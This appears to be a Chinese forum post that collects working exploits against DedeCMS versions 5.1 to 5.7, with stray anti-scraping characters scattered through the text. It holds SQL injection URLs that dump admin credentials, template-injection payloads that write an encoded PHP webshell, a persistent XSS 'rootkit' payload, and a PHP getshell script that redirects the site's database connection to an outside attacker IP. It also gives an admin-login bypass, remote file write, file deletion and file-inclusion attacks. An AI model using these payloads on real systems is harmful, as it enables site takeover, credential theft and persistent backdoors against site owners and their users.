|
|
6 t* ~" I5 ^+ I1 K* o3 `& e6 rDedecms 5.6 rss注入漏洞4 s) y' s# I$ s8 e
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
6 \. l0 G1 V1 u/ |* V) C T. g m2 w9 b1 d
( N2 W9 k/ G9 W5 k$ l; X, T( r3 R( J! u V
. ~/ a$ {5 b$ p" B% a
4 D! W5 C. g# @% k5 C- Y! `' m( \2 {
. _ ]( ^/ u$ I. n, e/ R6 k
6 ~; U" u* E! m% B2 W w- p3 y- Y& p5 b, r A u s8 B9 k
DedeCms v5.6 嵌入恶意代码执行漏洞
/ d+ ^- x8 ]$ r! `# }注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
7 O' o w) W$ {) N( d! F+ f7 p9 R发表后查看或修改即可执行, l ^. N. U" q0 V
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
0 m2 e. S( r& a& C) V生成x.php 密码xiao,直接生成一句话。
/ N6 r, V' o! ~! j; x1 m' v3 H% N$ V [
* t; W- y( H# z2 u8 D0 x4 p4 n% v* Z9 M
- s3 j; A7 d' f, V" G" l: i
! ?- R8 D: J2 S* n0 t, ?! P( y$ @, [% _/ n
; P, x+ \5 K: p/ u
* V# W4 N/ N) L& z X4 _5 lDede 5.6 GBK SQL注入漏洞$ m- d5 v5 R/ ?4 ]% W: q8 r
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
: `6 p: ~; t0 d5 C5 u4 G6 |http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
/ d3 h K- j( M1 w1 S6 x* l1 yhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A76 E2 s# Z8 B$ V* j7 |
5 D8 L, I5 F: `. l! P- m1 U
" E3 d% G! V& j$ B; M6 u
5 r1 e# I7 S, L
# E( k$ o6 ~5 j5 o" k1 \. }4 l
& [: H, c7 U6 Y8 m7 H+ V
, y7 _) [" Z9 j, N9 e3 T
' G# }! h7 q1 [5 R7 A W! g1 \/ D$ G
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞2 l3 b9 Y- p1 a0 V& i' n( v: z1 W
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
5 v X' z8 f r+ u) G9 S4 |- {8 w4 q8 f+ p' E; I0 @
& s; N! A0 i) \" r4 D
! ~% g1 B2 |" \6 H9 \! I ]& ]
: |1 j6 w& j( _0 s- J4 E4 o
1 y' o9 O' O+ T8 {2 R
9 H4 d+ ~, M6 \! }+ _) E: d+ x. \) fDEDECMS 全版本 gotopage变量XSS漏洞" L6 [+ A- r9 Z5 `: F3 b$ g' Y
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
) T. Z8 N' S ]/ R/ D3 a7 \http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="* i& Q- a1 q, v8 P1 |3 V1 w
9 u: A4 N/ ^& H7 A ^6 p
' J6 b$ y* Y5 z2 y `7 ^* F# ~4 @2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
$ B8 k* k( h, Q3 V$ t& ehttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
$ J0 ~0 @* u3 j: q/ @2 E+ `0 r9 a; f7 F) J/ X' a2 i3 b
* t# ?3 E+ ?5 b7 \. o; X2 Thttp://v57.demo.dedecms.com/dede/login.php1 x& B7 L- a3 [, I" Z
: l3 I$ z( |8 P7 U! a2 z
4 j8 {9 t1 X3 R4 p* Ccolor=Red]DeDeCMS(织梦)变量覆盖getshell
4 \, k: f! r% \2 k2 B#!usr/bin/php -w
9 y/ w7 w9 Z+ C6 D% r<?php
7 j0 I; C8 E+ Gerror_reporting(E_ERROR);) A. F+ h6 q* N/ n3 W D; G* z6 H
set_time_limit(0);
- u; N- F7 B% U1 fprint_r('
( K* g' V/ H& vDEDEcms Variable Coverage
/ q$ r' |1 B' G/ }Exploit Author: www.heixiaozi.comwww.webvul.com' r& V& k7 w w; x# g1 i( F8 j3 L
);- I; ]" R5 [' _2 R
echo "\r\n";8 D/ W7 ~% o. k( {& a! ^
if($argv[2]==null){4 P8 {' t, r, h+ ]9 i2 o
print_r('. ^+ e6 |2 m4 }: s( w
+---------------------------------------------------------------------------+
% o! C, s! U( |9 s! {4 jUsage: php '.$argv[0].' url aid path
/ a/ k; z& p+ P5 Maid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
( n9 @! X% `; H1 V+ _Example:
5 y* H& [( o) y$ }% z- B' Tphp '.$argv[0].' www.site.com 1 old% W/ Q1 N# m5 R/ D* e
+---------------------------------------------------------------------------+& L1 Q \' ^ \* X; I8 K1 z
');+ ?' D+ |0 H+ N1 g- M* a2 L
exit;
+ m k3 G! E3 u; ?: K/ M}
$ K' @' ?. C3 X1 G4 c$url=$argv[1];
- x+ Q' n4 ]1 {' e$ {) ~$aid=$argv[2];& d* y/ S& Y( Y7 g5 f, x# s
$path=$argv[3];
: K; V( g$ U' ]+ E( y2 S$exp=Getshell($url,$aid,$path);3 _4 \5 h( c& l7 t7 ]6 q+ O
if (strpos($exp,"OK")>12){1 `1 P9 u" o2 i1 a* d e
echo "+ B, _+ g5 {* M/ K
Exploit Success \n";
6 a/ g1 T+ C6 ]4 }9 }/ Vif($aid==1)echo "$ a! R2 l* {" f4 ^
Shell:".$url."/$path/data/cache/fuck.php\n" ;
/ M% ?- _( o9 \, k1 }3 z0 R9 ~* ~: Q9 [% D' w
; q0 H' Z! D9 i" _! x- gif($aid==2)echo "# j- m. q* [* V1 ` e
Shell:".$url."/$path/fuck.php\n" ;
" _; S" s, W( I! W8 Y) J( ^7 V; W+ ?2 J$ ]# l- Q$ k
2 C8 X, h# V4 J% T& X1 M6 N3 ^
if($aid==3)echo "
9 `4 L8 a5 `6 m/ R, wShell:".$url."/$path/plus/fuck.php\n";4 p4 `7 j) P t T9 }9 y
6 d; q3 z. h, Q; ], R7 p
# y9 V C0 F {7 m. d7 B, ?}else{' ` p% `4 D& K- [
echo "
' E; l5 Y& ~* b* HExploit Failed \n";- W8 ]3 Z9 r- j
}
. N* \( D& E$ Z! _3 sfunction Getshell($url,$aid,$path){& A- h; S: I7 r4 w% B
$id=$aid;% L, }' q: o2 S; f8 e* G8 t
$host=$url;& H( c7 Q& i) z) |/ z" K6 X
$port="80";
4 h/ P+ Z Y3 O$ y+ U% t$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
* f4 v8 y9 W0 s6 G5 i: @$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
3 R6 @# k9 o8 [, v! I$data .= "Host: ".$host."\r\n";
0 v. ^! o: K( w* ^6 g6 \5 m% }7 N* R$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
4 N; l! q& G9 X# R. l% g. i$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
/ P. W F4 D) H" N; G! f& `$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
' T7 a8 k2 c3 L" K- ]//$data .= "Accept-Encoding: gzip,deflate\r\n";
% n- h0 q4 D( e5 l2 r5 T/ X$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";" }( o4 o0 j7 _$ Y' A) S
$data .= "Connection: keep-alive\r\n";3 P+ S! m( B; S
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";6 X! V5 L/ q$ ]* u8 C
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";- N1 ^ c z! I% S& P" d% i$ j
$data .= $content."\r\n";
. ?) D, g' f/ H: ]4 t) w* f$ock=fsockopen($host,$port);/ W, L w' B/ f4 Q0 N7 b) \. W% r
if (!$ock) {% l) y( h" a" Z/ z- Y3 _& Q# p
echo "; z% O% B! g( A5 B# x
No response from ".$host."\n";
* p) i6 }$ v" Q}
$ Q0 y6 c0 L& |+ pfwrite($ock,$data);
" j+ N* {! q: u' t: V) dwhile (!feof($ock)) {
0 Z+ j9 c/ E- S4 [" a' Y( D/ B$exp=fgets($ock, 1024);
, q3 O! D$ i3 O( _7 v. Zreturn $exp;8 N/ u) t' `( O* s5 U" \) O: g- L
}2 E6 R0 L. N @# h: {2 H
}
- h! c/ e0 C, F, }, K$ V8 D# T1 G+ b, m+ O* q# ?1 ~
& l8 x& Q+ H& X6 X1 T# b/ D7 r9 E2 b
?>6 Z K6 l! C+ k# W/ w
% L% x: X0 a( z! O# t. O4 e$ p# A4 U: f) j# L
9 _7 {' U& J/ }% L3 I, L5 u4 Z' z& [& \+ s" B
1 B& D# d @$ i
) h, c+ F7 d* j" ]' A1 Q/ |; o+ v: U) p
; g* P0 `3 U6 a
5 a5 j5 n2 a$ f% c% v
: }; H! S- h% J( z; l/ G: z
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
7 G/ y, Y7 U V2 s7 c" c, Bhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
7 |6 I. S( H9 x8 _+ I2 r F# m! H$ x' h8 v k1 U8 k
0 N/ Y0 I1 {0 @& R
把上面validate=dcug改为当前的验证码,即可直接进入网站后台) A) N( l) N) c" I. G0 I
& Z4 c/ I/ O$ y- B" U" |3 |
- I7 t1 C7 d5 T- M+ u! i% J3 v3 A此漏洞的前提是必须得到后台路径才能实现8 I7 z+ v" n. w1 `5 j* G6 ` G
% ^' O8 m: d2 m6 k* p& r$ `
$ S& a) s& }5 ^; }, i5 q( T) {3 F! @& ?
J$ y: u1 ?7 j; \ ^# X
# a: `. e+ Y& N: @ i5 C) B4 v5 p$ x' l4 P+ y3 L }* Y* }" |
7 D* T1 x4 s3 V& y8 K
4 d( |+ p" {0 e1 z) W+ N1 Z$ A; d3 C" b# y
0 |8 [8 l; L) I( o% c$ D
Dedecms织梦 标签远程文件写入漏洞. H) A+ H$ q- [$ B4 w! J7 S
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
$ y% B' a5 F. x% c6 u2 ~( Z1 Y0 W0 O
2 p1 H, M& R/ W, a( m
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 * [9 Z, \; j5 O9 `5 U# |$ a; g) |
<form action="" method="post" name="QuickSearch" id="QuickSearch">6 k) A# P* g) G7 r+ H
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />+ P- j$ R6 T7 k( G, Y
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
6 o6 I( Q( N& S; P u<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
/ I5 A9 M% I6 O4 F3 y<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
6 f. \: [5 V1 p+ l) n/ K, K<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
* p1 `' b# @& I& O: e. R# U$ W: w1 K3 |<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; A* m/ Q/ G, i- o. e: h<input type="text" value="true" name="nocache" style="width:400">
* ]0 M) F4 Y' n7 d# Q- F<input type="submit" value="提交" name="QuickSearchBtn"><br />
: r0 Z" p* k: m1 Y</form>
3 a) W5 `" A) }! U- U" B7 p7 o8 h<script>
% i3 ^- ^6 k/ mfunction addaction()! C- _) K( Z0 o$ h- |% N3 a
{3 b& M! \# e5 L% |/ l8 i
document.QuickSearch.action=document.QuickSearch.doaction.value;
' M0 w0 L- x# p( U6 i}
* t$ s. S4 D* `- j; W1 C</script>
8 u. Q" f: z( O" t0 x3 C0 B" C3 W' G# s* D# p
" S3 r7 _$ ?, T, Y
5 @9 B2 z9 O- S( N% g& J
# B6 \ | A) H6 E. R# |( c- \7 X' U: g$ E0 z1 Y% d- g1 W, o
" Z( w r0 d: @7 M- D+ z1 Z/ P% \- ?* K# H3 \0 G
' m+ S$ N$ W' c
/ b( z i& S1 D
6 _+ X4 c9 p4 T MDedeCms v5.6 嵌入恶意代码执行漏洞& g4 r! @2 M4 }! w
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行* l1 E6 V' \0 }$ G R0 N+ j- ^ a
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}/ B& D$ i5 w$ I! S. P
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
C6 \" T( v1 j9 BDedecms <= V5.6 Final模板执行漏洞
2 L/ p" p; N: [ y( |# v注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
, b% i# _ @- J+ [9 Kuploads/userup/2/12OMX04-15A.jpg( d6 L; T. M2 e
; P, s( H/ T+ k; |1 Q
. Q3 e( q$ K% {6 j4 j- Q
模板内容是(如果限制图片格式,加gif89a):7 K# q$ B5 G) G/ J
{dede:name runphp='yes'}
$ }* v8 x% l& `9 A4 Q$fp = @fopen("1.php", 'a');
, E) D9 Q" s, l- c9 E" [@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
( n) x* _: Q) g# _& f@fclose($fp);! e/ L; A1 @2 A$ {6 S) O" ]
{/dede:name}$ Z7 w. B( K4 M6 \2 F" z
2 修改刚刚发表的文章,查看源文件,构造一个表单:4 Z, [1 f; ?5 m) f: h5 P5 Z1 B# @
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">& H. ^4 x& i Y3 o% A
<input type="hidden" name="dopost" value="save" />& u! [9 G5 }' N& Z; t4 R" d! E
<input type="hidden" name="aid" value="2" />+ d; V6 C2 a/ O5 l( z
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
0 w: z2 _6 V5 |; z' {/ t8 d& b<input type="hidden" name="channelid" value="1" />7 B) d# L3 u9 c6 X
<input type="hidden" name="oldlitpic" value="" />
: I8 W% I$ A" H! C9 g. M% T c<input type="hidden" name="sortrank" value="1275972263" />
4 f! S2 Z; z) y# R3 @
* e1 d$ z& O6 Q$ _" b, T# i& O' M4 q7 P7 I: c; Z, N6 M u
<div id="mainCp">
% J, \8 O( r' x4 {* f+ B<h3 class="meTitle"><strong>修改文章</strong></h3> d5 T Y9 h; w; z+ k
2 H h8 v, u: C8 M
) @5 E9 G' ]* m4 p6 p4 |0 w<div class="postForm">& a8 a- L, {0 d% j" Z$ r
<label>标题:</label>
1 Q( b4 T! k$ l0 i* E* Y# e<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>( @$ |& s2 o' j- `/ F
' A2 `1 _% C% t5 ^; M/ A, c( ]! Q5 V; D) r. X+ g
<label>标签TAG:</label>
( j2 f) j8 S7 v" m6 Y<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)+ P% g& h( K5 w! r6 r3 _0 Q
, x: n% s, r2 {( `
5 W, M! \) B4 F* P/ \' F<label>作者:</label>
" O7 c' a: w7 a! ?' ?6 b<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>+ \& F* `$ B; V! V: [6 J. j
2 E& x2 s5 m0 l7 x6 l7 v
4 w. ]$ P0 V2 a( o
<label>隶属栏目:</label>$ Z9 r* i7 s2 S% m2 Y2 |
<select name='typeid' size='1'>
( e" m+ o! I1 S<option value='1' class='option3' selected=''>测试栏目</option>
, t' l. E' X* d' L: R2 l</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
9 d% s4 ^- }! l) p' O2 O* ^5 k0 w" J
6 r2 Z2 q) Z: T. {9 u$ I4 X
<label>我的分类:</label>
9 w/ X, c) [9 c6 d<select name='mtypesid' size='1'>7 A8 {4 g* T+ `3 p+ e4 M4 f) R
<option value='0' selected>请选择分类...</option>
' y+ z+ p: h) o9 T9 G<option value='1' class='option3' selected>hahahha</option>2 B: G5 @: q, F( J
</select>
0 z8 ~) b- o1 S: ]% _1 u
6 @3 G! P2 }' A( J" ~2 e) q
; X4 O. {! Z' m; ]3 c<label>信息摘要:</label>
( i H1 ^/ W1 d- g, n9 v<textarea name="description" id="description">1111111</textarea>5 _+ G$ r/ L! e
(内容的简要说明)
! d, W3 x- H- y2 Q& G$ y# R, H$ s' n& D& s5 Y8 |( T
4 y6 l1 {, B" Z<label>缩略图:</label>/ [( \+ `/ L- [" `2 q: f
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>9 f/ v0 K) K- C# t
. e* w1 p4 X& U8 H# z# {) a
8 O4 v3 g# r$ t0 C7 R6 X& K<input type='text' name='templet'% X3 {* c! `0 ?6 M, F
value="../ uploads/userup/2/12OMX04-15A.jpg">5 t7 C+ C( D6 R$ Q
<input type='text' name='dede_addonfields'
5 y: |8 H2 L. q# k/ l: d9 D% w, ]value="templet,htmltext;">(这里构造)
4 r: |& g8 A+ k" H; n: r" o& v3 W</div>
; m% Z. H2 n9 r4 ~4 e: _- c. A. v' V+ X' o
9 h, d0 ]3 h; K) ]/ d<!-- 表单操作区域 -->
R+ K' Q) s- H+ C. U. `9 I<h3 class="meTitle">详细内容</h3>
( l7 C0 K) E' G) {3 h1 b
' F: Z8 g2 I! d/ I! z( E' F% T2 v' x, A* Y/ e" p
<div class="contentShow postForm">! R) H% j; D9 u) W: Q- e
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>$ D: P: c( H! L) D; G; D3 W
9 E8 Z. x R% ]
, O5 S( B5 H4 U8 r+ Z# t
<label>验证码:</label>
% [$ _7 x$ W5 ~! E6 z6 D) _<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
, m" w3 W4 r" j% I* G<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
6 d( U/ G2 R' q! x: `# Q% F0 ^! j4 ~% p4 a
7 \7 @" D2 P" l) M<button class="button2" type="submit">提交</button>
$ d- K# T4 V( V/ W" O2 [<button class="button2 ml10" type="reset">重置</button>; l. Z: ]9 L8 ~' d+ P. x
</div>
8 q; \% Z, Y# Y, w' `7 r' J$ l3 Q
3 {1 p, I7 f9 d# Y! Q1 Q# B
$ h0 b8 W+ V* T6 m, s5 ?</div>" G: l+ P- t& }" c, R8 x2 Y
0 }. \; S& ~1 k2 [* K5 @$ [: |* g
( C! |% G7 ?3 E
</form>% ]8 g- R" w) Y" W ?* _& i
* M- L( K7 N! H+ ^8 V' b" S
1 u# u/ t" f$ Z+ x5 {5 ]" {提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:/ n6 g7 ?! m" X( o( }
假设刚刚修改的文章的aid为2,则我们只需要访问:$ C5 ? K9 c! Y/ N# o" B6 I
http://127.0.0.1/dede/plus/view.php?aid=2# O* w$ x5 ?! `, r0 @
即可以在plus目录下生成webshell:1.php
5 e5 {+ h& X- w5 P+ x! }9 {! r
& ^: {5 p* k4 [6 a4 ` d! q6 h5 F# `7 K V* f6 E
* i' D, ^9 c! O/ b! n( p8 \/ N
2 q+ ~5 J5 W1 p/ i, U3 w0 o d4 H$ j3 T5 e' q
& M9 @5 ^, {8 v" ` t" q0 Z% i
; `) J+ E& k: v/ b) y6 e) [4 _- V$ d) m3 H2 M/ \# I2 E
* c* m* E% \# g: s7 C5 k* R1 {: M, T- w7 i+ E, G i) l
6 w# Q) Q3 l7 k9 ?
6 g0 L$ T( p; F) q8 U
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)# g7 T/ b( @* q* I% A$ ^
Gif89a{dede:field name='toby57' runphp='yes'}/ L3 @4 q6 A k
phpinfo();4 r3 k& o& o8 O
{/dede:field}+ Y; y9 c% h; _5 b& x" A7 k
保存为1.gif
* C% u( }, R* M1 A# N* N<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> % O/ |: |, W6 p, Q) I- Y+ k3 r
<input type="hidden" name="aid" value="7" /> + q0 X) J7 P% r9 J1 [2 K) v# c
<input type="hidden" name="mediatype" value="1" />
7 `3 i J, T0 T<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> - [( W. W9 `- ^$ p, o% b7 L* i9 l
<input type="hidden" name="dopost" value="save" /> / F% T( k: \1 v1 K( m$ h
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ; y2 y8 b& j) d4 h6 j/ v6 a9 q
<input name="addonfile" type="file" id="addonfile"/> 3 {0 ~- w/ y& Z& t( M) \
<button class="button2" type="submit" >更改</button>
: p3 A$ @1 x$ z; g9 _3 ]% o</form>
6 o: P' ?4 c; o( u7 @* u2 [* i+ ~+ c$ L: U( L2 v* s0 c9 e4 g2 ~
: F4 O/ k" O' `/ T构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
" |9 C! E: W m0 ^5 ?! e9 H2 K6 A/ R发表文章,然后构造修改表单如下:
5 m1 Z% i2 [' k* T) F. y4 ^7 P8 v9 j4 M% j" L$ w
* L$ |1 @) j, C+ h" I q
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
( i9 W% w0 o: N1 i7 }: H/ W7 _$ A' Z<input type="hidden" name="dopost" value="save" /> $ ?. r. A; i' l: \6 s
<input type="hidden" name="aid" value="2" /> 3 M" i& z! V. O2 F: y% {8 r
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
0 ^& A% x& R0 T" ]7 j/ K/ Q+ Q<input type="hidden" name="channelid" value="1" /> * B$ f6 V( C" u, C: l
<input type="hidden" name="oldlitpic" value="" />
7 M" V: N w8 }1 M9 [7 k<input type="hidden" name="sortrank" value="1282049150" /> 9 s8 B- Y/ ]# P7 @* O' a/ u0 a( l
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> , z" w' q+ l3 u: V
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
2 i5 u, i$ C9 y5 K, L0 t" L2 o<select name='typeid' size='1'> . H2 `( O5 }; ~# b7 u
<option value='1' class='option3' selected=''>Test</option> 6 H q, t: F7 F( r: a0 s$ [
<select name='mtypesid' size='1'> ; q1 f; i$ T3 c" j% v
<option value='0' selected>请选择分类...</option> 1 q& Y3 R% ?9 |: P; A' }
<option value='1' class='option3' selected>aa</option></select> - b- v9 B+ w% l" x1 F7 X
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
; B3 c& }/ a* Z& o2 S<input type='hidden' name='dede_addonfields' value="templet">
! O; L* Z7 Y, [4 _3 i<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> * n: J9 i% p1 u' A
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> / Q% _: e0 h b& e% [! T
<button class="button2" type="submit">提交</button>
- Z# w7 ~3 i w% p' h( h</form>
2 ~" k# d2 j1 h z& j6 H# E$ I% U, t, Z, m7 S; \
! _. R! q+ Z% Z) {, k6 J6 d2 \
2 L/ {- O8 a+ p9 t) b2 O4 n& A
. F& G6 M7 \$ K& j% y8 E' u$ M- H
, f! t/ P7 t; P2 @" m# D+ H! r, ]# F3 I1 G2 m/ O- T
& h0 O% U4 B+ X% {# F0 f( ~' h8 N. J
, t: k! s+ }8 r, h- e7 r
5 a5 O8 f! O0 Z2 Y
6 x7 l n9 x! D" N2 c" m) v0 k9 @( B+ P% f! Y( p- H8 T0 ?; P" Q! Q8 P
% d8 k' n/ W( t# t' ^
织梦(Dedecms)V5.6 远程文件删除漏洞: n- y/ U, B; l- ~- E
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
4 J, I# A3 P" n3 Q% ^) R \7 m+ P9 ]$ w9 f; M* \
7 b0 t, ~, `0 j2 Z R0 h; h6 ?; T. c5 q
/ T4 M: y7 \ N0 p
% G+ Y# ~5 P# w" G% n; w+ s1 F9 Y/ {# b$ w
" I8 N0 Z) W' M
8 ^0 c% C7 D* D. e3 p4 g M1 R4 y
1 d# y+ p+ D7 L& n& r7 M- A# c
- q. d: q! q9 N) a2 |% U! {织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 ( i* g/ q% J) f! i, Z' R1 C2 H
http://www.test.com/plus/carbuya ... urn&code=../../
z$ A6 }( X; s" w
0 J, u) C+ ]& q6 c6 I7 z5 ~
. a" u9 a3 _$ [& a) }5 w' E j& n: }0 Y$ A
. i5 F, }' ~5 e. q) I3 \: {# v; g1 H# c. t# U
5 L+ w$ U' I7 T" v9 c8 Q2 L7 W
& |$ |/ d9 S3 F0 J2 L0 u0 r7 j+ \- q. d6 I
- w" D3 k8 [& V, ]( F* [6 p
. A- Z! O- _7 K% b7 |9 A. S+ QDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 5 e; V- Z1 n; ?) ]
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
9 y0 J G9 m& [% [密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
/ Q/ R& w0 s7 h6 Y% W, w U$ Q2 x/ n; W0 K& C; l0 d" m4 v
/ \( a7 R% ~+ p" C: z* c- M8 q9 D" d$ H1 V @' P
0 `9 w* {5 X" }# ?
: E) f# q! Z$ l
$ }/ S8 W: O- k% O
7 B! b( O. ~5 e; @9 d, P3 ?# `5 l9 ?
z- e8 t s/ l6 | Z' F6 B
" [8 s/ U6 p" t8 Z
/ [5 d# {2 p. U- n' S* F织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
! x1 N9 w4 j$ P, Xhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='' B& \4 T+ X( {* `
9 o B# m6 V4 N" u2 b
8 V5 ^7 x. v8 [* ]' ?: @: R) r$ C3 b6 ?" U& o \
7 ?, O# H& E& q6 Y
0 Q p Q/ M) t4 |; k8 L+ y
3 E& p& o% [, Q% `3 k* t
